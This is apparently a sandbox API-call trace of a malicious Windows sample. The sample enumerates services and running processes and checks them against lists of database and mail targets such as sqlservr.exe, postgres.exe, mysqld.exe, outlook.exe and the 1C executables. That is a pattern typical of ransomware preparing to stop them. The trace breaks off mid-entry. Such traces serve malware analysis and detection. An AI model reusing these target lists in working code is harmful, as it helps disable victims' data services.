[0254.442] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0254.442] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0254.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0254.442] lstrlenW (lpString="eventlog") returned 8 [0254.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0254.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0254.442] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0254.443] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0254.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0254.443] lstrlenW (lpString="EventSystem") returned 11 [0254.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0254.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0254.443] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0254.443] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0254.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0254.443] lstrlenW (lpString="gpsvc") returned 5 [0254.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0254.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0254.443] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0254.443] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0254.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0254.443] lstrlenW (lpString="LanmanWorkstation") returned 17 [0254.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0254.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0254.443] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0254.443] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0254.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0254.443] lstrlenW (lpString="lmhosts") returned 7 [0254.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0254.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0254.443] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0254.443] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0254.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0254.443] lstrlenW (lpString="MMCSS") returned 5 [0254.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0254.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0254.443] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0254.443] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0254.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0254.443] lstrlenW (lpString="MpsSvc") returned 6 [0254.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0254.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0254.444] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0254.444] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0254.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0254.444] lstrlenW (lpString="NlaSvc") returned 6 [0254.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0254.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0254.444] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0254.444] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0254.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0254.444] lstrlenW (lpString="nsi") returned 3 [0254.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0254.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0254.444] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0254.444] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0254.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0254.444] lstrlenW (lpString="PcaSvc") returned 6 [0254.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0254.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0254.444] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0254.444] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0254.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0254.444] lstrlenW (lpString="PlugPlay") returned 8 [0254.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0254.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0254.444] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0254.444] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0254.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0254.444] lstrlenW (lpString="Power") returned 5 [0254.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0254.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0254.444] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0254.444] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0254.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0254.445] lstrlenW (lpString="ProfSvc") returned 7 [0254.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0254.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0254.445] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0254.445] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0254.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0254.445] lstrlenW (lpString="RpcEptMapper") returned 12 [0254.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0254.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0254.445] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0254.445] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0254.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0254.445] lstrlenW (lpString="RpcSs") returned 5 [0254.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0254.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0254.445] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0254.445] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0254.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0254.445] lstrlenW (lpString="SamSs") returned 5 [0254.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0254.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0254.445] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0254.445] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0254.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0254.445] lstrlenW (lpString="Schedule") returned 8 [0254.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0254.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0254.445] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0254.445] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0254.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0254.445] lstrlenW (lpString="SENS") returned 4 [0254.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0254.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0254.446] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0254.446] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0254.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0254.446] lstrlenW (lpString="ShellHWDetection") returned 16 [0254.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0254.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0254.446] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0254.446] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0254.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0254.446] lstrlenW (lpString="Spooler") returned 7 [0254.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0254.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0254.446] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0254.446] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0254.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0254.446] lstrlenW (lpString="SysMain") returned 7 [0254.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0254.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0254.446] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0254.446] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0254.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0254.446] lstrlenW (lpString="Themes") returned 6 [0254.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0254.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0254.446] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0254.446] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0254.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0254.446] lstrlenW (lpString="UxSms") returned 5 [0254.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0254.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0254.446] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0254.446] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0254.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0254.447] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0254.447] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0254.448] Process32FirstW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.448] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.448] lstrlenW (lpString="System") returned 6 [0254.448] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0254.448] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0254.448] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0254.448] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0254.448] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0254.448] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0254.448] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0254.448] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.449] lstrlenW (lpString="smss.exe") returned 8 [0254.449] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0254.449] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0254.449] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0254.449] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0254.449] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0254.449] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0254.449] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0254.449] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.449] lstrlenW (lpString="csrss.exe") returned 9 [0254.449] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0254.449] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0254.449] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0254.449] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0254.449] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0254.449] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0254.449] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0254.449] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.449] lstrlenW (lpString="wininit.exe") returned 11 [0254.450] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0254.450] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0254.450] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0254.450] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0254.450] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0254.450] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0254.450] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0254.450] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.450] lstrlenW (lpString="csrss.exe") returned 9 [0254.450] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0254.450] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0254.450] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0254.450] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0254.450] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0254.450] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0254.450] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0254.450] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.450] lstrlenW (lpString="winlogon.exe") returned 12 [0254.450] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0254.450] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0254.451] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0254.451] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0254.451] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0254.451] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0254.451] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0254.451] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.451] lstrlenW (lpString="services.exe") returned 12 [0254.451] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0254.451] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0254.451] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0254.451] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0254.451] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0254.451] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0254.451] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0254.451] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.451] lstrlenW (lpString="lsass.exe") returned 9 [0254.451] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0254.451] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0254.451] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0254.452] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0254.452] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0254.452] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0254.452] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0254.452] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0254.452] lstrlenW (lpString="lsm.exe") returned 7 [0254.452] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0254.452] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0254.452] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0254.452] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0254.452] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0254.452] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0254.452] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0254.452] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.453] lstrlenW (lpString="svchost.exe") returned 11 [0254.453] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0254.453] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0254.453] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0254.453] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0254.453] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0254.453] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0254.453] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0254.453] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.453] lstrlenW (lpString="svchost.exe") returned 11 [0254.453] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0254.453] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0254.453] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0254.453] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0254.453] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0254.453] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0254.454] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0254.454] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.454] lstrlenW (lpString="svchost.exe") returned 11 [0254.454] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0254.454] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0254.454] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0254.454] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0254.454] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0254.454] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0254.454] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0254.454] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.454] lstrlenW (lpString="svchost.exe") returned 11 [0254.455] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0254.455] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0254.455] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0254.455] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0254.455] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0254.455] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.455] lstrlenW (lpString="svchost.exe") returned 11 [0254.455] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0254.456] lstrlenW (lpString="audiodg.exe") returned 11 [0254.456] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.456] lstrlenW (lpString="svchost.exe") returned 11 [0254.456] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.456] lstrlenW (lpString="svchost.exe") returned 11 [0254.456] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0254.456] lstrlenW (lpString="userinit.exe") returned 12 [0254.457] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.457] lstrlenW (lpString="dwm.exe") returned 7 [0254.457] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.457] lstrlenW (lpString="explorer.exe") returned 12 [0254.457] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0254.457] lstrlenW (lpString="spoolsv.exe") returned 11 [0254.457] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, 